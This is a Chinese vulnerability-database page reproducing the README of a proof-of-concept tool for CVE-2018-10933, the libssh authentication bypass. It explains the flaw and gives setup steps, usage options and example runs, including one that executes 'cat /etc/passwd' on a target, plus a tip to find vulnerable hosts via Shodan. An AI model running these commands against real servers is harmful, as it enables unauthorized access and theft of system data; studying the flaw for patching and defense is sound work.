CVE-2018-10933 PoC — libssh server-side state machine 安全漏洞

来源

https://github.com/Rubikcuv5/CVE-2018-10933

关联漏洞

标题:libssh server-side state machine 安全漏洞 (CVE-2018-10933)
Description:libssh是一个用于访问SSH服务的C语言开发包，它能够执行远程命令、文件传输，同时为远程的程序提供安全的传输通道。server-side state machine是其中的一个服务器端状态机。 libssh的server-side state machine 0.7.6之前版本和0.8.4之前版本中存在安全漏洞。攻击者可借助恶意的客户端利用该漏洞在不进行身份验证的情况下创建通道，进而获取未授权的访问权限。

Description

libSSH-Authentication-Bypass

介绍


# CVE-2018-10933
![](https://www.bastify.com/wp-content/uploads/2019/02/ssh-tunneling.png)

***
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4.
A malicious client could create channels without first performing authentication, resulting in unauthorized access.

## SOME DETAILS
The issue comes from the way libssh doesn't maintain state for the authentication and how this can be used to bypass the authentication. Basically, think of the connection as a multi-step process: step1, step2, step3... Since libssh doesn't enforce the order of the steps, you can basically jump to step3 without going through step1 and step2.

Interestingly, the same issue was found in the SSH library Paramiko earlier: CVE-2018-7750.

## Documentation
Exploit-DB : https://www.exploit-db.com/exploits/45638

Information about CVE-2018-10933 by libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt

Bugfix Release by libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/

## Setup

```
sudo apt-get install python3

gh repo clone EmmanuelCruzL/CVE-2018-10933

pip3 install -r requirements.txt

python3 main.py

```
## Usage
```
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host

Script for the vulnerabilities CVE-2018-10933

positional arguments:
  host                  the ip or domain address of ssh server

options:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  The port the service ssh, default [22]
  -log, --logfile       Logfile to write conn logs
  -t, --test            check the version of libSSH
  -c COMMAND, --command COMMAND
                        command to execute
  -i, --interactive     open the interactive mode
   
```

## EXAMPLES POC

### EXAMPLE( check if the host is vulnerable)
```
python3 main.py  0.0.0.0 -port 22  -t
```
![](https://imgr.co/cache/img/2b54583d34c2d1406025927166ad6d1f.jpg)

### EXAMPLE( send command via argument)
```
python3 main.py  0.0.0.0 -p 22  -c "cat /etc/passwd"
```
![](https://i.imgur.com/mGCfyt4.png)

### EXAMPLE( using interactive simple console)
```
python3 main.py  0.0.0.0 -p 22  -l
```
![](https://i.imgur.com/F2f3ral.png)


## Shodan.io libSSH
  ```diff
 [!] can find  devices vulnerables using shodan.io 
 -  ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )
```

![](https://i.imgur.com/MBUWEg4.png)


## Authors

- [Rubickcuv](https://github.com/EmmanuelCruzL)

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看

备注

1. 建议优先通过来源进行访问。

2. 本地 POC 快照面向订阅用户开放；当原始来源失效或无法访问时，本地镜像作为订阅权益的一部分提供。

查看订阅方案 →

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2018-10933 PoC — libssh server-side state machine 安全漏洞

来源

关联漏洞

Description

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！